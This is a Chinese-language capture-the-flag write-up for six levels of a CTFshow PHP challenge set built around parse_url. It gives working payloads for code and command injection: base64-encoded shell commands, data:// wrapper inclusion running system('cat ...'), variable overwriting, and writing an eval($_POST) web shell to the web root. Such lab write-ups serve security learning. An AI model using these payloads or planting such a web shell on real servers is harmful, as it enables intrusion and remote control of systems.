CTFSHOW 周末大挑战
第一关
<?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2023-05-10 09:52:06 # @Last Modified by: h1xa # @Last Modified time: 2023-05-10 10:58:34 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ $data = parse_url($_GET['u']); eval($data['host']);
这道题可以直接进行命令执行。
刚开始我的思路是用?u=aa://echo(`ls`);来进行命令执行,但是发现如果要读取根目录下的flag的话会被自动截断,导致命令无法正常执行。
看了官方wp后,发现可以base64来绕过出现 ls /被截断的情况。
payload:?u=aa://system(base64_decode('Y2F0IC9mKg=='));
第二关
<?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2023-05-10 09:52:06 # @Last Modified by: h1xa # @Last Modified time: 2023-05-12 13:25:53 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ $data = parse_url($_GET['u']); include $data['host'].$data['path'];
这里可以看到利用文件包含来获得flag,这里的话将host与path进行拼接。
我们可以使用php伪协议。
payload:?u=https://data:://text/plain;base64,PD9waHAKc3lzdGVtKCdjYXQgL19mMWFnXzFzX2gzcmUudHh0Jyk7Cj8%2B
(这里的话对于base64编码之后的+需要进行url编码,URL 中的特殊字符需要进行编码)
第三关
<?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2023-05-10 09:52:06 # @Last Modified by: h1xa # @Last Modified time: 2023-05-12 13:29:18 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ $data = parse_url($_GET['u']); include $data['scheme'].$data['path'];
这里也是同样的道理,我们使用php伪协议
payload:?u=data:://text/plain;base64,PD9waHAKc3lzdGVtKCdjYXQgL19mMWFfZ18xc19oM3JlJyk7Cj8%2B
第四关
<?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2023-05-10 09:52:06 # @Last Modified by: h1xa # @Last Modified time: 2023-05-12 13:29:35 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ $data = parse_url($_GET['u']); system($data['host']);
这道题payload:?u=user://`echo 'Y2F0IC8xX2YxYWdfMXNfaDNyZQog'|base64 -d`
第五关
<?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2023-05-10 09:52:06 # @Last Modified by: h1xa # @Last Modified time: 2023-05-12 13:29:38 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ extract(parse_url($_GET['u'])); include $$$$$$host;
这道题考点就是变量覆盖。
payload:?u=user://pass:query@scheme/?fragment%23data://text/plain,<?php system('cat /_f1ag_1s_h3ree');?>
这里比较简单,就不多做描述了,就是变量覆盖,最后执行的是data伪协议,来获取flag。
第六关
<?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2023-05-10 09:52:06 # @Last Modified by: h1xa # @Last Modified time: 2023-05-12 13:29:18 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ $data = parse_url($_GET['u']); file_put_contents($data['path'], $data['host']);
file_put_contents函数将一句话写入到1.php中
所以payload:?u=ctfshow://<script language='php'>eval($_POST[1]);/var/www/html/1.php
浙公网安备 33010602011771号